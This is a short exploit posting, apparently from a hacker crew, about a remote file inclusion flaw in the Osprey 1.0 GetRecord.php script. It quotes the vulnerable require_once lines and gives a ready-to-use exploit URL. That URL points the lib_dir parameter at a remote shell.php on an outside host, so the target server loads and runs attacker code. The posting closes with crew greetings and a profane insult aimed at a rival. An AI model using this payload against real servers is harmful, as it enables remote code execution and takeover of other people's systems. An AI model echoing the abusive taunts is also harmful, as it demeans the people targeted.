Osprey suffers from a remote file inclusion vulnerability in GetRecord.php.
2ec7fe72ab7cc360e8dd353f94ea91751f1e216841b13d923c2905e997ad6ac9
###### ToXiC #########################
#
# Osprey Remote File Inclusion by ToXiC CreW
#
# ToXic Security Italian CreW
# BuG FounD by Drago84
#
# Application Affect:
# Osprey
#
# Page:
# GetRecord.php
# Dir :
# /osprey-1.0/web/lib/xml/oai/
#
# Problem:
# require_once($lib_dir .'Document.class.php');
# require_once('MetadataFormats.php');
# require_once($xml_dir .'WddxSerialize.php');
# require_once($xml_dir .'XslTransform.php');
#
# ExPloit :
#
https://www.site.com/osprey-1.0/web/lib/xml/oai/GetRecord.php?lib_dir=h
ttp://sonic-banda-di-lamer.gay/shell.php?
#
#
#GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########